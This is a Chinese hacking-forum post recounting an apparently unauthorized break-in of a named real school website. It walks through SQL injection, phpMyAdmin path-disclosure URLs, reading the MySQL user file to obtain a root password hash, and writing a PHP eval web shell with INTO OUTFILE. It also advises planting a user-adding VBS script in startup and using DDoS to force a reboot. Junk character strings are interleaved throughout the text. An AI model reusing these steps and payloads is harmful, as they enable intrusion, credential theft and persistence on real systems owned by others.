第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 U* T; c! N& W/ g. r
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!' j! X1 `% _" [9 Y7 {8 U
$ z m, a! N+ p3 y ^" x! ~$ U8 E
9 T* I9 O% {* c) S
, m* g/ U2 L7 l c4 U0 D. J
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
4 Z8 B+ u/ W0 z. N. U' l" X: Z+ ~$ O `2 N1 c
那么想可以直接写入shell ,getshell有几个条件:6 C6 {( ~" y8 t: B9 B
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
4 k2 Q- ]7 d0 ~* I& n8 R$ k# d- H# v, Y) u( D( g# N
试着爆绝对路径: W% F5 R, V U9 U8 |* G
1./phpMyAdmin/index.php?lang[]=1
# i; B9 x# y, Y2./phpMyAdmin/phpinfo.php % t7 f& V3 w* F; U: F9 n" ^
3./load_file()
; I4 a' t3 P2 U. m6 _! e4./phpmyadmin/themes/darkblue_orange/layout.inc.php
5 ^. k, T, u( L7 L6 {5./phpmyadmin/libraries/select_lang.lib.php
5 Q1 x- P5 Y# a4 D: T: K! D6./phpmyadmin/libraries/lect_lang.lib.php
% a" u% ^, E3 ^! `* Z7 D& [7./phpmyadmin/libraries/mcrypt.lib.php
; U |4 r; C$ G8./phpmyadmin/libraries/export/xls.php
' ?8 C. B$ D! |% m7 K6 y1 {4 P
均不行...........................
2 X' N+ Y5 v2 ]: V# [9 r8 h* v6 ^ O
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
+ X# X$ `* A1 Q% G/ U
8 k: F( Q% N. L6 N$ B' g权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( _) m$ @: T! s: y* V/ m& v
h3 j) w7 }1 N9 V默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 d; t+ A6 B% a8 n0 s/ b( T; ?. I/ o e1 Z% c- ^$ f' S
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... ; W0 o. A3 q0 j2 @
7 F, A) i) z/ h5 G+ m0 O想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 3 x0 A0 @. X q* f1 j0 I
5 {: V2 H9 I8 d& A" z
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
/ U$ m/ I8 g) ] K. \
: q; S! ?, c6 T4 r- f2 I自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! I: S) N: x: R, J/ V
) E5 L; Y, g" b) V成功读到root密码: . Z5 ~; o9 Y7 L
5 x5 f% ~% @; R8 m8 @9 w( B& B! J
17---- r(0072) , p0 j: z/ ~6 n Y
18---- o(006f) 0 h- o7 m2 P9 }# f4 b0 ^
19---- o(006f) & n" }$ W' |5 }+ g9 s
20---- t(0074)
! j& C: y% o8 [' v; ?21---- *(002a) 6 f2 U- e4 R/ q6 a* F3 w
22---- 8(0038) , H4 Y n9 b7 N$ [8 P& F! t/ ]; d
23---- 2(0032) ' ]8 L7 V1 ^( X% ~
24---- E(0045)
: w1 H1 ?' h# b; p2 ]3 w" _25---- 1(0031)
% o% M) w0 w' [! r) X2 i/ N7 G {26---- C(0043) & h6 K1 B5 U$ ?$ D; o$ @7 r7 U
27---- 5(0035) 0 R+ u; b! z+ R) \
28---- 8(0038) # I7 n# v: D5 V/ L/ j8 n0 A
29---- 2(0032)
. r( K1 Y; g/ l3 S) g$ R7 W30---- 8(0038)
, `, K3 Q! P; ^. c& e% F) t6 K31---- A(0041)
! L1 k+ I" N8 V4 B4 R3 |32---- 9(0039) ' J7 Q1 }% f4 t/ {/ r
33---- B(0042)
0 A- Z& [0 b p x4 z) q# {4 O34---- 5(0035)
/ X2 R1 U# B- t! v+ j35---- 4(0034)
: {9 d* E, @" @7 i36---- 8(0038) 2 ?$ W2 g! W- |$ z
37---- 6(0036)
. H" E) I0 |0 \$ B/ c3 E38---- 4(0034) 2 [: M3 W* K0 Y7 C+ @; e
39---- 9(0039)
0 F) J; l: p; V2 D7 D- Y8 k6 t40---- 1(0031)
: u$ e" k; M/ }& n- `3 l41---- 1(0031) & W; b; P1 x: O
42---- 5(0035) 3 g5 j* D, g; r" h* z& _! a
43---- 3(0033) ; K& M6 r1 p$ x2 `- J* ?
44---- 5(0035) 1 e6 P" [5 W! Q& ~6 Q& V4 z6 O& w
45---- 9(0039) / X# [. m8 }: g
46---- 8(0038) , y+ V& }! } F2 \/ f# }- c8 F4 m: k
47---- F(0046) + C, [6 s: A# b, Z
48---- F(0046)
! y: q! F0 G8 e7 A4 ]49---- 4(0034) % z( v: g+ ^) W4 Q
50---- F(0046)
, D( N# _ ^9 }$ v& Y1 s6 Z51---- 0(0030)
* K# y2 ~7 S4 |52---- 3(0033) * c/ Y5 ]- F: o9 m
53---- 2(0032) ! h2 a; t' l% x( `. D
54---- A(0041)
5 c0 G9 A! d; F4 ~55---- 4(0034) ' } z/ G$ d# E2 F% e9 z
56---- A(0041)
% S6 j* G" {9 L! R6 `; L: D57---- B(0042) . W" n- G. @, u: U1 v' c" L
58---- *(0044)
8 ]5 j' z m% m! P# W59---- *(0035) * J% Q; k3 |% B5 O& P
60---- *(0041)
! J' t3 F* n$ ]1 l1 ?, o/ S& Q" L61---- *0032) ) O& z" m. {1 ~$ j/ h5 k& T
- U. y2 R/ v! ]
解密后成功登陆phpmyamin
d; B2 T" o: p* { : i( D% W5 F' R4 B- X# ~
$ x! P1 R. C+ C% R1 b1 k 1 ^7 P. I3 H/ n8 q5 }
0 i0 f; R' y# g8 G0 `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
d$ t; W$ n/ `" y2 U0 }" B
4 |$ F5 j$ r7 t7 c6 I& f+ \# ^成功执行,拿下shell,菜刀连接: 6 k# V+ D! v8 C
, Y8 O9 u" E5 U3 q! e服务器不支持asp,aspx,php提权无果...................
8 t- ]! h% X0 G1 X/ m$ m* e1 b, n2 P5 T( m
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 6 q$ U0 L2 M8 x, z, }- x. r
服务器上已经有个隐藏帐号了 0 t$ M3 ]/ R' ~" ]8 P- q3 Z
别名 administrators6 H4 ?, h1 o, C; w
注释 管理员对计算机/域有不受限制的完全访问权 * a/ Q2 R$ Z$ l5 n8 P0 v
成员
3 m' c7 H' j* _4 A-------------------------------------------------------------------------------7 s$ E( D3 D4 |! f
admin
^4 r7 h l. A( |6 _4 YAdministrator- H" U1 P% o9 v; i/ ]
slipper$
) g8 v- U4 z. }3 N7 z6 ]6 jsqluser
9 z3 a: E) K: i9 F, }命令成功完成。 7 S+ B1 P" t5 a: t" j/ v
9 P: z9 ^' w! O$ W( z
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 L+ m. U/ p' P3 s
$ K" y/ n% w9 O8 F$ ~4 s' p# }# J
ddos服务器重启,不然就只能坐等服务器重启了...............................3 s* B5 p0 u! A, O6 f8 c
; M$ P' |) X! S J! s7 f( M
3 B7 |% R3 L5 Z+ U' d2 Q4 B- l | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
